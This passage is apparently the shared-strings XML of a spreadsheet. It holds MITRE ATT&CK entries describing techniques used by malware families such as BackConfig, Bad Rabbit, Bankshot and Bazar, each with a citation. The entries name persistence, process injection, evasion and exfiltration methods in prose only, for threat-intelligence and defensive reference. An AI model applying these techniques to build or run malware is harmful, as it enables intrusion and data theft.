    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has used cmd.exe to execute commands.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)	</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in &lt;code&gt;%USERPROFILE%\Adobe\Driver\dwg\&lt;/code&gt; and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as &lt;code&gt;ShellExecuteA&lt;/code&gt; and &lt;code&gt;HttpOpenRequestA&lt;/code&gt; in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples contain a publicly available Web browser password recovery tool.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects address book information from Outlook.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) contains a cleanup module that removes traces of itself from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can download additional modules from C2.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can use a network scanning module to identify ICS-related ports.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about running processes.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) injects itself into explorer.exe.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) adds Registry Run keys to achieve persistence.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can enumerate and map ICS-specific systems in victim environments.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can use rundll32 for execution on compromised hosts.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the OS and computer name.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the Internet adapter configuration.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects the current username from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has attempted to bypass UAC and gain elevated administrative privileges.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has encrypted files and disks using AES-128-CBC and RSA-2048.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) spread through watering holes on popular sites by injecting JavaScript into the HTML body or a &lt;code&gt;.js&lt;/code&gt; file.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) used the EternalRomance SMB exploit to spread through victim networks.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used an executable that installs a modified bootloader to prevent normal boot-up.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used [Mimikatz](https://attack.mitre.org/software/S0002) to harvest credentials from the victim's machine.(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has been executed through user installation of an executable disguised as a flash installer.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has masqueraded as a Flash Player installer through the executable file &lt;code&gt;install_flash_player.exe&lt;/code&gt;.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used various Windows API calls.(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) enumerates open SMB shares on internal victim networks.(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606)’s &lt;code&gt;infpub.dat&lt;/code&gt; file uses NTLM login credentials to brute force Windows machines.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) can enumerate all running processes to compare hashes.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used rundll32 to launch a malicious DLL as &lt;code&gt;C:Windowsinfpub.dat&lt;/code&gt;.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606)’s &lt;code&gt;infpub.dat&lt;/code&gt; file creates a scheduled task to launch a malicious executable.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) drops a file named &lt;code&gt;infpub.dat&lt;/code&gt;into the Windows directory and is executed through SCManager and &lt;code&gt;rundll.exe&lt;/code&gt;.</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) searches for files with specific file extensions.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) can download and execute or update malware.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) has a keylogging capability.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) stores collected data in log files before exfiltration.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses SMTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) establishes a foothold by adding a link to the malware executable in the startup folder.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) captures screenshots in .jpg format and then exfiltrates them.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses WMI to enumerate installed security products in the victim’s environment.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information. (Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing audio.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) was signed with valid Certum certificates.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) can support commands to execute Java-based payloads.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) can collect local files from the system .(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has decoded its PowerShell script.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can upload files from a victim's machine over the C2 channel.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has a command to delete a file.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has a command to list files on a system.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can download files to the system.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) contains keylogging capabilities.(Citation: BH Manul Aug 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has used lure documents to convince the user to enable macros.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has used the ShellExecuteW() function call.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has a command built in to use a raw TCP socket.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can detect USB devices.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used PowerShell loaders as part of execution.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has been launched by starting iexplore.exe and replacing it with [Bandook](https://attack.mitre.org/software/S0234)'s payload.(Citation: Lookout Dark Caracal Jan 2018)(Citation: EFF Manul Aug 2016)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can support commands to execute Python-based payloads.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of taking an image of and uploading the current desktop.(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is delivered via a malicious Word document inside a zip file.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used .PNG images within a zip file to build the executable. (Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used AES encryption for C2 communication.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) can collect information about the drives available on the system.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has a command to get the public IP address from a system.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing video from a victim's webcam.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used malicious VBA code against the target system.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of spawning a Windows command shell.(Citation: EFF Manul Aug 2016)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) recursively generates a list of files within a directory and sends them back to the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) collects files from the local system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) decodes embedded XOR strings.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers domain and account names/information through process monitoring.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) exfiltrates data over its C2 channel.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for files on the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) deletes all artifacts associated with the malware from the infected machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uploads files and secondary payloads to the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) writes data into the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj&lt;/code&gt;.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) encodes commands from the control server using a range of characters and gzip.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) identifies processes and collects the process ids.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) generates a false TLS handshake using a public certificate to disguise C2 network communications.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for certain Registry keys to be configured before executing the payload.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers system information, network addresses, disk type, disk free space, and the operation system version.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) modifies the time of a file as specified by the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses HTTP for command and control communication.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses the command-line interface to execute arbitrary commands.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) can terminate a specific process by its process id.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use TLS in C2 communications.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been downloaded via Windows BITS functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534)'s loader can delete scheduled tasks created by a previous instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can retrieve information from the infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can decrypt downloaded payloads. [Bazar](https://attack.mitre.org/software/S0534) also resolves strings and other artifacts at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bazar](https://attack.mitre.org/software/S0534) has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.(Citation: NCC Group Team9 June 2020)	</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to identify domain administrator accounts.(Citation: NCC Group Team9 June 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can implement DGA using the current date as a seed variable.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use [Nltest](https://attack.mitre.org/software/S0359) tools to obtain information about the domain.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has used dual-extension executable files such as PreviewReport.DOC.exe.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can hash then resolve API calls at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to use an alternative C2 server if the primary server fails.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can delete its loader using a batch file in the Windows temporary folder.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate the victim's desktop.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify administrator accounts on an infected host.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a task named to appear benign.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has named malicious shortcuts "adobe" and mimicked communications software.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader is used to download and execute the [Bazar](https://attack.mitre.org/software/S0534) backdoor.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use various APIs to allocate memory and facilitate code execution/injection.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate shared drives on the domain.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has used XOR, RSA2, and RC4 encrypted files.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a PowerShell script received from C2.(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identity the current process on a compromised host.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process using process doppelgänging.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process including Svchost, Explorer, and cmd using process hollowing.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject code through calling &lt;code&gt;VirtualAllocExNuma&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query &lt;code&gt;Windows\CurrentVersion\Uninstall&lt;/code&gt; for installed applications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create or add files to Registry Run Keys to establish persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate remote systems using &lt;code&gt; Net View&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a scheduled task for persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the installed antivirus engine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can establish persistence by writing shortcuts to the Windows Startup folder.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query the Registry for installed applications.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has a variant with a packed payload.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been spread via emails with embedded malicious links.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can send C2 communications with XOR encryption.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can fingerprint architecture, computer name, and OS version on the compromised host. [Bazar](https://attack.mitre.org/software/S0534) can also check if the Russian language is installed on the infected machine and terminate if it is found.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the IP address and NetBIOS name of an infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the username of the infected user.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the time on the compromised host.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use a timer to delay execution of core functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can attempt to overload sandbox analysis by sending 1550 calls to &lt;code&gt;printf&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) downloads have been hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can launch cmd.exe to perform reconnaissance commands.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a WMI query to gather information about the installed antivirus engine.(Citation: Cybereason Bazar July 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use Winlogon Helper DLL to establish persistence.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has decrypted function blocks using a XOR key during runtime to evade detection.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
